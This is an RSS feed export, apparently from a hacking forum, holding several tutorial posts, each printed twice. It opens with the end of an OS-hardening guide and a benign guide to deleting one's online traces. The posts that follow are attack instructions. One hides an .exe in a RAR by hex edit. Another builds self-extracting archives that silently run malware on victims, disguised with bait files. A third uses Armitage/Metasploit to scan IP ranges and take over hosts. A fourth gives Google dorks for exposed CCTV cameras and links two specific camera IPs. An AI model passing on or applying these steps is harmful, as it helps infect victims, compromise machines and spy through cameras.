<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">Are you serious? After reading all that stuff you still think you can make your OS unhackable? Well there is not solution for that as "<span style="font-weight: bold;">Nothing is Secure</span>"</div></div>
<div style="text-align: center;"><span style="font-style: italic;"><span style="font-weight: bold;">A Guide Written by Ex094<br />
Some reference taken from Wikipedia and Google</span></span></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA["Erase" yourself online]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Erase-yourself-online</link>
			<pubDate>Fri, 07 Jun 2013 20:50:54 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Erase-yourself-online</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://i.imgur.com/x9y38Wr.png?1?8661" border="0" alt="[Image: x9y38Wr.png?1?8661]" /></div>
<br />
<span style="font-size: medium;">This tutorial comes as a result of my own carelessness and the need to start "erasing" myself from the internet. I write "erase" in quotes because there's no way you will be able to completely eliminate every single trace of yourself. <br />
The reason for this is because you have no idea of how things has been stored, backed up, copied, etc. When deleting an account it might not even be deleted at all. It might just be changing a single value in the database.<br />
But the goal with this tutorial is to help you remove as much as possible. The process in theory is simple, but the practical task is hard, time consuming, and boring.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Gathering information</span></span></span><br />
<span style="font-size: medium;">The very first thing you will have to do is to gather as much information as possible about yourself. You need to find all the profiles you're currently using, and the ones you've had in the past.<br />
To do this you need to search for anything about yourself that you can think of. A list of obvious search queries is<ul>
<li>Full name</li>
<li>Usernames (all you can remember)</li>
<li>Phone number (current and old ones)</li>
<li>Email addresses (current and old ones)</li>
<li>Date of birth</li>
<li>Places you've lived / visited + your name</li>
<li>Websites you've left comments on<br />
</li></ul>
You should also try to search for various combinations of the information listed above. Real name + username, username + date of birth, real name + phone number, email + real name, etc.<br />
To do this you should use at least <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="http://google.com" target="_blank">Google</a></span></span> and <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="https://pipl.com" target="_blank">Pipl</a></span></span>. The activity logs on social networks are also helpful in this process.<br />
<br />
Another thing you need to do, is to look for duplicated images of yourself. Images that you've posted, that someone might have re-posted. Obvious images to check is profile images,<br />
and any other publicly available images. The Google image search is great for this. Go to <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="https://encrypted.google.com/imghp?hl=en&amp;tab=wi" target="_blank">Google Image Search</a></span></span>, drag'n'drop the image to the search field and Google will search for similar images.<br />
This way you can find any sites using your image. You can also add your name, username, email, etc to the search.<br />
<br />
It's also important to take notes about whatever you find, and use it when digging even further for information about yourself. This information can also be valuable when trying to recall login credentials.<br />
<br />
This process is just like any hacking reconnaissance process really.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Erase yourself</span></span></span><br />
<span style="font-size: medium;">Obviously, you will have to delete your profiles. It might sound very straight forward, but it does take a bit more work than just "cancel account". Since you're trying to erase yourself you need to make<br />
sure that the information is actually gone. To make this happen you need to modify your profile information, delete/replace profile picture, delete any uploaded images and other media that can identify you.<br />
To generate fake profile information I strongly recommend the <span style="font-weight: bold;"><span style="text-decoration: underline;"><a href="http://www.fakenamegenerator.com/" target="_blank">Fake Name Generator</a></span></span>. This provides detailed fake personal data, and a disposable email address that you can use to replace the original one.<br />
<br />
If you find some really old accounts that you completely had forgotten, you might find yourself clueless about the user credentials to get authorized. This means you will have to email the support for help on<br />
how to recover your account. Don't say that it's because you're going to delete it. This might result in they doing it for you and you will not get the opportunity to replace the old content with the fake.<br />
<br />
When all these profiles are gone it's time to get started on comments you've made. Some comment fields allow you to delete your own comments. In other cases you will have to contact the appropriate people<br />
and ask for them to remove the comments for you. If possible, send the email from the same email as you entered when writing the comment. This way it's easier to verify you as the actual author of the comment.<br />
<br />
If you also want to delete yourself from social networks like Facebook and Google+ you must also remember to untag yourself on all pictures, get your friends/followers to remove any tags in pictures,<br />
statuses and comments, etc as well.<br />
<br />
You will also have to cancel blogs and personal websites.<br />
<br />
On the profiles you want to continue using you will need to modify disclosing content. The level of disclosure is up to yourself. If you're paranoid with tinfoil hat, you will need to remove any information about yourself.<br />
You will have to hide/remove date of birth, age, email, name, any relations such as family and friends, etc. This will also make it harder for people to make you a victim of black mailing.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Order of cancellation</span></span></span><br />
<span style="font-size: medium;">The order you delete your accounts in does not really matter. The only exception is your email accounts which should be the last thing you delete. <br />
The reason for this is that when you delete a profile you will often have to confirm the cancellation by clicking a link that is sent to the primary email address for that profile.<br />
So if you delete this email first you will not be able to confirm the cancellation, and you'll have to start emailing the support which can be along lasting and annoying task.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Final words</span></span></span><br />
<span style="font-size: medium;">As always, I hope you found this helpful and if you have any suggestions or questions please let me know <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /></span>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://i.imgur.com/x9y38Wr.png?1?8661" border="0" alt="[Image: x9y38Wr.png?1?8661]" /></div>
<br />
<span style="font-size: medium;">This tutorial comes as a result of my own carelessness and the need to start "erasing" myself from the internet. I write "erase" in quotes because there's no way you will be able to completely eliminate every single trace of yourself. <br />
The reason for this is because you have no idea of how things has been stored, backed up, copied, etc. When deleting an account it might not even be deleted at all. It might just be changing a single value in the database.<br />
But the goal with this tutorial is to help you remove as much as possible. The process in theory is simple, but the practical task is hard, time consuming, and boring.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Gathering information</span></span></span><br />
<span style="font-size: medium;">The very first thing you will have to do is to gather as much information as possible about yourself. You need to find all the profiles you're currently using, and the ones you've had in the past.<br />
To do this you need to search for anything about yourself that you can think of. A list of obvious search queries is<ul>
<li>Full name</li>
<li>Usernames (all you can remember)</li>
<li>Phone number (current and old ones)</li>
<li>Email addresses (current and old ones)</li>
<li>Date of birth</li>
<li>Places you've lived / visited + your name</li>
<li>Websites you've left comments on<br />
</li></ul>
You should also try to search for various combinations of the information listed above. Real name + username, username + date of birth, real name + phone number, email + real name, etc.<br />
To do this you should use at least <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="http://google.com" target="_blank">Google</a></span></span> and <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="https://pipl.com" target="_blank">Pipl</a></span></span>. The activity logs on social networks are also helpful in this process.<br />
<br />
Another thing you need to do, is to look for duplicated images of yourself. Images that you've posted, that someone might have re-posted. Obvious images to check is profile images,<br />
and any other publicly available images. The Google image search is great for this. Go to <span style="text-decoration: underline;"><span style="font-weight: bold;"><a href="https://encrypted.google.com/imghp?hl=en&amp;tab=wi" target="_blank">Google Image Search</a></span></span>, drag'n'drop the image to the search field and Google will search for similar images.<br />
This way you can find any sites using your image. You can also add your name, username, email, etc to the search.<br />
<br />
It's also important to take notes about whatever you find, and use it when digging even further for information about yourself. This information can also be valuable when trying to recall login credentials.<br />
<br />
This process is just like any hacking reconnaissance process really.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Erase yourself</span></span></span><br />
<span style="font-size: medium;">Obviously, you will have to delete your profiles. It might sound very straight forward, but it does take a bit more work than just "cancel account". Since you're trying to erase yourself you need to make<br />
sure that the information is actually gone. To make this happen you need to modify your profile information, delete/replace profile picture, delete any uploaded images and other media that can identify you.<br />
To generate fake profile information I strongly recommend the <span style="font-weight: bold;"><span style="text-decoration: underline;"><a href="http://www.fakenamegenerator.com/" target="_blank">Fake Name Generator</a></span></span>. This provides detailed fake personal data, and a disposable email address that you can use to replace the original one.<br />
<br />
If you find some really old accounts that you completely had forgotten, you might find yourself clueless about the user credentials to get authorized. This means you will have to email the support for help on<br />
how to recover your account. Don't say that it's because you're going to delete it. This might result in they doing it for you and you will not get the opportunity to replace the old content with the fake.<br />
<br />
When all these profiles are gone it's time to get started on comments you've made. Some comment fields allow you to delete your own comments. In other cases you will have to contact the appropriate people<br />
and ask for them to remove the comments for you. If possible, send the email from the same email as you entered when writing the comment. This way it's easier to verify you as the actual author of the comment.<br />
<br />
If you also want to delete yourself from social networks like Facebook and Google+ you must also remember to untag yourself on all pictures, get your friends/followers to remove any tags in pictures,<br />
statuses and comments, etc as well.<br />
<br />
You will also have to cancel blogs and personal websites.<br />
<br />
On the profiles you want to continue using you will need to modify disclosing content. The level of disclosure is up to yourself. If you're paranoid with tinfoil hat, you will need to remove any information about yourself.<br />
You will have to hide/remove date of birth, age, email, name, any relations such as family and friends, etc. This will also make it harder for people to make you a victim of black mailing.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Order of cancellation</span></span></span><br />
<span style="font-size: medium;">The order you delete your accounts in does not really matter. The only exception is your email accounts which should be the last thing you delete. <br />
The reason for this is that when you delete a profile you will often have to confirm the cancellation by clicking a link that is sent to the primary email address for that profile.<br />
So if you delete this email first you will not be able to confirm the cancellation, and you'll have to start emailing the support which can be along lasting and annoying task.</span><br />
<br />
<span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #87CEFA;">Final words</span></span></span><br />
<span style="font-size: medium;">As always, I hope you found this helpful and if you have any suggestions or questions please let me know <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Dedicated to linuxephus the ghost exe in a rar...?]]></title>
			<link>http://www.hackcommunity.com/Thread-Dedicated-to-linuxephus-the-ghost-exe-in-a-rar</link>
			<pubDate>Wed, 05 Jun 2013 10:58:06 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Dedicated-to-linuxephus-the-ghost-exe-in-a-rar</guid>
			<description><![CDATA[<div style="text-align: center;"><span style="font-size: large;">Hey guys! I am going to show you how to make a <span style="color: #87CEFA;">"ghost"</span> .exe in a .rar file!</span><br />
<br />
<span style="font-size: x-small;"><span style="color: #A9A9A9;">*By ghost file, I mean an invisible file that you cannot see while browsing the .rar file.</span></span></div>
<br />
<br />
<span style="font-size: medium;"><span style="color: #FF6347;">Tools you will need:</span></span><ul><span style="color: #1E90FF;"></li>
<li>Winrar ---&gt;<a href="http://www.win-rar.com/download.html?&amp;L=0" target="_blank">Click HERE for a download link.</a></span></li>
<li>Hex Workshop ---&gt; <span style="color: #FF6347;"><a href="http://download.cnet.com/Hex-Workshop/3000-2352_4-10004918.html?part=dl-HexWorksh&amp;subj=dl&amp;tag=button" target="_blank">Click HERE for a download link.</a></span></li>
<li>Your Brain ---&gt;<span style="color: #FFFFFF;"> I hope you don't need to download this...</span><br />
</li></ul>
<br />
<span style="font-size: medium;"><span style="color: #1E90FF;">Okay, now that you have everything needed, lets start!</span></span><br />
<ol type="1">
<li>Right click on your .exe file, click crete a rar file and compress</li>
<li>Open the .rar you just made and then CTRL+F insede box type .exe to find your file.</li>
<li>When you see the name of your .exe file, go 30 bytes up and find the string t and then change the value 74 to 00 and hit save.</li>
<li>Finally you open your rar and make sure you cannot see your .exe file inside the browser.<br />
</li></ol>
<br />
<br />
My next turotial will be on how execute the ghost .exe and with .lnk <br />
Now you've got homework! <br />
Hug @<a id="mention_33223" href="User-Linuxephus%E2%84%A2"><span style="color:#fff600;">Linuxephus™</span></a> <img src="images/smilies/heart.gif" style="vertical-align: middle;" border="0" alt="Heart" title="Heart" />]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><span style="font-size: large;">Hey guys! I am going to show you how to make a <span style="color: #87CEFA;">"ghost"</span> .exe in a .rar file!</span><br />
<br />
<span style="font-size: x-small;"><span style="color: #A9A9A9;">*By ghost file, I mean an invisible file that you cannot see while browsing the .rar file.</span></span></div>
<br />
<br />
<span style="font-size: medium;"><span style="color: #FF6347;">Tools you will need:</span></span><ul><span style="color: #1E90FF;"></li>
<li>Winrar ---&gt;<a href="http://www.win-rar.com/download.html?&amp;L=0" target="_blank">Click HERE for a download link.</a></span></li>
<li>Hex Workshop ---&gt; <span style="color: #FF6347;"><a href="http://download.cnet.com/Hex-Workshop/3000-2352_4-10004918.html?part=dl-HexWorksh&amp;subj=dl&amp;tag=button" target="_blank">Click HERE for a download link.</a></span></li>
<li>Your Brain ---&gt;<span style="color: #FFFFFF;"> I hope you don't need to download this...</span><br />
</li></ul>
<br />
<span style="font-size: medium;"><span style="color: #1E90FF;">Okay, now that you have everything needed, lets start!</span></span><br />
<ol type="1">
<li>Right click on your .exe file, click crete a rar file and compress</li>
<li>Open the .rar you just made and then CTRL+F insede box type .exe to find your file.</li>
<li>When you see the name of your .exe file, go 30 bytes up and find the string t and then change the value 74 to 00 and hit save.</li>
<li>Finally you open your rar and make sure you cannot see your .exe file inside the browser.<br />
</li></ol>
<br />
<br />
My next turotial will be on how execute the ghost .exe and with .lnk <br />
Now you've got homework! <br />
Hug @<a id="mention_33223" href="User-Linuxephus%E2%84%A2"><span style="color:#fff600;">Linuxephus™</span></a> <img src="images/smilies/heart.gif" style="vertical-align: middle;" border="0" alt="Heart" title="Heart" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Simple Way To Infect People With RAR Files]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Simple-Way-To-Infect-People-With-RAR-Files</link>
			<pubDate>Wed, 05 Jun 2013 08:10:11 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Simple-Way-To-Infect-People-With-RAR-Files</guid>
			<description><![CDATA[This is a simple way of infecting your slave with a virus, trojan, worm, or any kind of malicious code.<br />
All you need is :<br />
<ol type="1">
<li>The malicious EXE.</li>
<li>Winrar.<br />
</li></ol>
<br />
<br />
You can get winRAR from here : <a href="http://www.rarlab.com/download.htm" target="_blank">http://www.rarlab.com/download.htm</a><br />
<br />
So, here are the steps :<br />
<ol type="1">
<li>Install winRAR in your computer.</li>
<li>Right click on your malicious EXE.</li>
<li>Click on "Add to archive".</li>
<li>Tick on "Create SFX archive" checkbox.</li>
<li>Open the "Advanced" tab.</li>
<li>Click on "SFX Options" button.</li>
<li>Open the "General" tab.</li>
<li>A textbox appears with "Run after extraction" written on top.</li>
<li>Type the filename of your malicious EXE like this "server.exe" without quotes.<br />
</li></ol>
<br />
<br />
And you're done!!!<br />
Make your slave extract the rar file that is created in his/her computer.<br />
Make sure your slave has winrar installed in his/her computer.<br />
<br />
To make the rar archive less suspicious, you make add some ebooks or pictures or music along with the malicious exe.<br />
<br />
Keep infecting!!!<br />
Enjoy hacking!!]]></description>
			<content:encoded><![CDATA[This is a simple way of infecting your slave with a virus, trojan, worm, or any kind of malicious code.<br />
All you need is :<br />
<ol type="1">
<li>The malicious EXE.</li>
<li>Winrar.<br />
</li></ol>
<br />
<br />
You can get winRAR from here : <a href="http://www.rarlab.com/download.htm" target="_blank">http://www.rarlab.com/download.htm</a><br />
<br />
So, here are the steps :<br />
<ol type="1">
<li>Install winRAR in your computer.</li>
<li>Right click on your malicious EXE.</li>
<li>Click on "Add to archive".</li>
<li>Tick on "Create SFX archive" checkbox.</li>
<li>Open the "Advanced" tab.</li>
<li>Click on "SFX Options" button.</li>
<li>Open the "General" tab.</li>
<li>A textbox appears with "Run after extraction" written on top.</li>
<li>Type the filename of your malicious EXE like this "server.exe" without quotes.<br />
</li></ol>
<br />
<br />
And you're done!!!<br />
Make your slave extract the rar file that is created in his/her computer.<br />
Make sure your slave has winrar installed in his/her computer.<br />
<br />
To make the rar archive less suspicious, you make add some ebooks or pictures or music along with the malicious exe.<br />
<br />
Keep infecting!!!<br />
Enjoy hacking!!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking PC With Armitage]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Hacking-PC-With-Armitage</link>
			<pubDate>Sat, 01 Jun 2013 13:08:18 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Hacking-PC-With-Armitage</guid>
			<description><![CDATA[Hello, here is Nullerset, for beginning, i wanna say that i am Native Russian, so sorry me if my english is not perfect<br />
<br />
So Let`s start<br />
<br />
Open Armitage and click "Connect". And Now wait... ( I use armitage in Kali Linux, he is not same with BackTrack`s versions, but it`s not important )<br />
<br />
When Open it click "Hosts &gt; Msf Scans &gt; Place the range of scanning IP`s ( or just one IP ); Ranges you can find out there: <a href="http://ipdiapazon.16mb.com/" target="_blank">http://ipdiapazon.16mb.com/</a> ( It`s on Russian, sorry, but this is the best resource with IP Ranges, every range it`s own range for provider of internet connection  )<br />
<br />
Okey, now we are scanning the network.<br />
<br />
Note: MSF Scan understands ranges 192.168.0.0-192.168.255.255 and 192.168.0.0/24, but nmap understands just 192.168.0.0/24<br />
<br />
Warning!! Do not scan very big networks, if you have already started scanning - you will not be able to cancle it, even if you close the window.<br />
<br />
I thinked that i canceled scanning, but after that when i get back i had a lot of computers, becouse of my armitage stoped work :|<br />
<br />
<br />
Ok, and now when we scanned all IP`s, let`s hack it<br />
<br />
After it MSF Scans will try to detect OS, if it not detect then try to Hosts &gt; Nmap Scan &gt; Quick Scan ( OS Detect )<br />
<br />
Ok, now click Attacks &gt; Find Attacks and Armitage will get all exploit`s wich can exploit the target open ports ( But it shouldn`t be vulnerability to all hosts )<br />
<br />
If ports are open, you will see in the meny that opened by clicking "right mouse buttown" "Attacks &gt; [type of exploit] &gt; [Name of exploit] "<br />
<br />
Now list this down and you will see "Check Exploits", not all exploits get you opportunity to check them <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
<br />
But if exploit support`s check you will see in the list ( down of Armitage ) the progress of chegking.<br />
<br />
If target is vulnerability to some exploit you will see the text "The target is Vulnerability" it`s good! And you`re got some chances to compromise the target <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
Good, now do not forget the name of exploit and let`s try to exploit.<br />
<br />
Click "Right button mouse" on host &gt; Attacks &gt; Exploits and click on name of exploit<br />
<br />
You will see the menu with settings of exploit. We are Interested in<br />
<br />
LHOST - Your IP<br />
<br />
LPORT - Your Open Port<br />
RHOST - Remote Target IP<br />
RPORT - Remote Target Port<br />
<br />
Ok, Click Launch and if victim really vulnerability then arround of host you will see red animation<br />
 <br />
<br />
<img src="http://cs412531.vk.me/v412531821/479/FA1jisZeChE.jpg" border="0" alt="[Image: FA1jisZeChE.jpg]" /><br />
<br />
There you see that i saw when hacked my LAN computer :<br />
<br />
So click Rigth Button on Mouse and you will see menu with name "Meterpreter". In this menu you will see the functions like as RAT<br />
<br />
So, you hacked computer by IP! <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
<br />
Writed by Nu11ers3t<br />
From Moscow <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" />]]></description>
			<content:encoded><![CDATA[Hello, here is Nullerset, for beginning, i wanna say that i am Native Russian, so sorry me if my english is not perfect<br />
<br />
So Let`s start<br />
<br />
Open Armitage and click "Connect". And Now wait... ( I use armitage in Kali Linux, he is not same with BackTrack`s versions, but it`s not important )<br />
<br />
When Open it click "Hosts &gt; Msf Scans &gt; Place the range of scanning IP`s ( or just one IP ); Ranges you can find out there: <a href="http://ipdiapazon.16mb.com/" target="_blank">http://ipdiapazon.16mb.com/</a> ( It`s on Russian, sorry, but this is the best resource with IP Ranges, every range it`s own range for provider of internet connection  )<br />
<br />
Okey, now we are scanning the network.<br />
<br />
Note: MSF Scan understands ranges 192.168.0.0-192.168.255.255 and 192.168.0.0/24, but nmap understands just 192.168.0.0/24<br />
<br />
Warning!! Do not scan very big networks, if you have already started scanning - you will not be able to cancle it, even if you close the window.<br />
<br />
I thinked that i canceled scanning, but after that when i get back i had a lot of computers, becouse of my armitage stoped work :|<br />
<br />
<br />
Ok, and now when we scanned all IP`s, let`s hack it<br />
<br />
After it MSF Scans will try to detect OS, if it not detect then try to Hosts &gt; Nmap Scan &gt; Quick Scan ( OS Detect )<br />
<br />
Ok, now click Attacks &gt; Find Attacks and Armitage will get all exploit`s wich can exploit the target open ports ( But it shouldn`t be vulnerability to all hosts )<br />
<br />
If ports are open, you will see in the meny that opened by clicking "right mouse buttown" "Attacks &gt; [type of exploit] &gt; [Name of exploit] "<br />
<br />
Now list this down and you will see "Check Exploits", not all exploits get you opportunity to check them <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
<br />
But if exploit support`s check you will see in the list ( down of Armitage ) the progress of chegking.<br />
<br />
If target is vulnerability to some exploit you will see the text "The target is Vulnerability" it`s good! And you`re got some chances to compromise the target <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
Good, now do not forget the name of exploit and let`s try to exploit.<br />
<br />
Click "Right button mouse" on host &gt; Attacks &gt; Exploits and click on name of exploit<br />
<br />
You will see the menu with settings of exploit. We are Interested in<br />
<br />
LHOST - Your IP<br />
<br />
LPORT - Your Open Port<br />
RHOST - Remote Target IP<br />
RPORT - Remote Target Port<br />
<br />
Ok, Click Launch and if victim really vulnerability then arround of host you will see red animation<br />
 <br />
<br />
<img src="http://cs412531.vk.me/v412531821/479/FA1jisZeChE.jpg" border="0" alt="[Image: FA1jisZeChE.jpg]" /><br />
<br />
There you see that i saw when hacked my LAN computer :<br />
<br />
So click Rigth Button on Mouse and you will see menu with name "Meterpreter". In this menu you will see the functions like as RAT<br />
<br />
So, you hacked computer by IP! <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
<br />
Writed by Nu11ers3t<br />
From Moscow <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CCTV Hacking Tutorial]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-CCTV-Hacking-Tutorial</link>
			<pubDate>Fri, 31 May 2013 08:24:39 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-CCTV-Hacking-Tutorial</guid>
			<description><![CDATA[Search this in your Google..<br />
It will give you thousands of unprotected cams.. ^^<br />
<br />
<br />
Dorks :<br />
<blockquote><cite>Quote:</cite>/home/homeJ.html<br />
inurl:/view/viewer_index.shtml<br />
inurl:/view/temp.shtml<br />
inurl:appletvid.html<br />
inurl:"viewerframe?mode="</blockquote>
<br />
Just a Sample.. ^^<br />
Riverfront<br />
<a href="http://173.190.94.9/CgiStart?page=Single&amp;Language=0" target="_blank">http://173.190.94.9/CgiStart?page=Single&Language=0</a><br />
<br />
Switzerland Office<br />
<a href="http://193.138.213.169/CgiStart?page=Single" target="_blank">http://193.138.213.169/CgiStart?page=Single</a><br />
<br />
<img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" />]]></description>
			<content:encoded><![CDATA[Search this in your Google..<br />
It will give you thousands of unprotected cams.. ^^<br />
<br />
<br />
Dorks :<br />
<blockquote><cite>Quote:</cite>/home/homeJ.html<br />
inurl:/view/viewer_index.shtml<br />
inurl:/view/temp.shtml<br />
inurl:appletvid.html<br />
inurl:"viewerframe?mode="</blockquote>
<br />
Just a Sample.. ^^<br />
Riverfront<br />
<a href="http://173.190.94.9/CgiStart?page=Single&amp;Language=0" target="_blank">http://173.190.94.9/CgiStart?page=Single&Language=0</a><br />
<br />
Switzerland Office<br />
<a href="http://193.138.213.169/CgiStart?page=Single" target="_blank">http://193.138.213.169/CgiStart?page=Single</a><br />
<br />
<img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" />]]></content:encoded>
		</item>
	</channel>
</rss>